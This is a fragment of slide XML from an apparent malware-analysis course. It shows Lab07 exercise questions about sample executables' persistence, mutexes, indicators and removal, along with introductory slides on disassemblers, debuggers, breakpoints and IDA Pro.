            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Kernel32.dll</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1316" name="Google Shape;1316;p141"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4644008" y="2708920"/>
            <a:ext cx="4314825" cy="380047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42"/>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DLL Practice</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1322" name="Google Shape;1322;p142"/>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Write an DLL allows users to call a function for printing a list of process to screen</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43"/>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Practice [Lab07]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1328" name="Google Shape;1328;p143"/>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Font typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>PE files:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lab07-01.exe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Check persistent running of the program (when rebooting)?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Why does the program use a mutex?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Host-based/Network-based indicators?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What is the purpose of the program?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>When will it finish executing?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>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144"/>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Practice [Lab07]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1335" name="Google Shape;1335;p144"/>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Font typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>PE file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lab07-02.exe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>How does this program achieve persistence?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What is the purpose of this program?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>When will this program finish executing?</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45"/>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Practice [Lab07]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1341" name="Google Shape;1341;p145"/>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Font typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>PE file: Lab07-03.exe + Lab07-03.dll</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>How does this program achieve persistence?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What are two good host-based signatures for this malware?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What is the purpose of this program?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>How could you remove this malware once it is installed?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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146"/>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Disassembler vs. Debugger</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1347" name="Google Shape;1347;p146"/>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Debugger: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>designed to run code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Source-level debugger</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>usually built into integrated development environments (IDEs)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Assembly-level debugger</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>operate on assembly code instead of source code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Commonly used</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1600200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>WinDbg: kernel and user debugging</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1600200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OllyDbg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: user debugging</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1600200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>IDA Pro: user debugging &amp; disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Disassembler: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>is not interested in running code</a:t>
            </a:r>
            <a:endParaRPr b="1"/>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47"/>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Disassembler</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1353" name="Google Shape;1353;p147"/>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Two main types</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Linear sweep: windbg</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Recursive descent: IDA Pro</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Output is generally a disassembly listing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Can yield extremely large text files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Difficult to navigate/change</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Disassembly fails to reveal obfuscated code</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148"/>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Debugger</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1359" name="Google Shape;1359;p148"/>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b="1" lang="en-GB"/>
              <a:t>Using a debugger</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Single-Stepping</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>run a single instruction and then return control to the debugger. The debugger stops after every instruction.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Stepping-over</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>step-over = bypass</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Stepping-Into</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Go into the first instruction</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Breakpoint</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Software breakpoint: stop at a particular instruction</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Hardware breakpoint: stop at a location (address)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Conditional breakpoint: a software breakpoint that will only if a certain condition is true</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149"/>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IDA Pro</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1366" name="Google Shape;1366;p149"/>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Developed by Ilfak Guilfanov</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Professional disassembler</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Fast and interactive</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>IDA Pro Free and license</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Add comments, label data, name function …. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
